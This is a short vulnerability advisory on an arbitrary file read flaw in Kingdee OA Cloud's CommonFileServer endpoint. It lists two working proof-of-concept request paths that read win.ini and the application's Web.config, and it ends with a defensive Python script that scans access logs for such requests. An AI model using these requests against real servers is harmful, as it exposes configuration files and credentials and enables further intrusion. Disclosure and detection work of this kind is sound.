Kingdee OA Cloud Star CommonFileServer arbitrary file reading vulnerability
Vulnerability Description
The Kingdee OA Cloud Starry Sky CommonFileServer interface has an arbitrary file reading vulnerability. An attacker can use the vulnerability to obtain sensitive files from the server and then attack the server further.
Vulnerability Impact
Kingdee OA Cloud Starry Sky
Network surveying and mapping
Vulnerability reproduction
Login page
Verify POC
/CommonFileServer/c%3a%2fwindows%2fwin.ini
/CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config
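A defender's check for the two requests above, added here as an example and not part of the original post: it scans web access logs for CommonFileServer requests whose percent-decoded target is a Windows drive-letter path. The log field layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines; the field layout is an assumption:
# date time method url status client_ip
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /CommonFileServer/c%3a%2fwindows%2fwin.ini 200 198.51.100.7
2024-01-01 10:00:05 GET /CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config 200 198.51.100.7
2024-01-01 10:00:09 GET /commonfileserver/c%3A%5Cwindows%5Cwin.ini 404 198.51.100.7
2024-01-01 10:01:12 GET /CommonFileServer/3f2a9c1e.png 200 203.0.113.20
2024-01-01 10:02:30 GET /K3Cloud/html5/index.aspx 200 203.0.113.20
"""

PREFIX = "/commonfileserver/"
# A drive letter followed by ":" and a slash of either kind, e.g. c:/ or C:\
DRIVE_PATH = re.compile(r"^[a-z]:[\\/]", re.IGNORECASE)


def requested_file(url):
    """Return the decoded path asked of CommonFileServer, or None for other URLs."""
    path = unquote(url.split("?", 1)[0])
    if not path.lower().startswith(PREFIX):
        return None
    return path[len(PREFIX):]


def scan(log_text):
    """Return one dict per request that asks CommonFileServer for a drive-letter path."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # not in the assumed layout
        _date, _time, _method, url, status, client = fields[:6]
        target = requested_file(url)
        if target is not None and DRIVE_PATH.match(target):
            # A 200 response means the file content was probably returned.
            hits.append({"client": client, "file": target, "served": status == "200"})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits with `served` set to true are the ones to triage first, since the server answered with the file.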
This post is licensed under CC BY 4.0 by the author.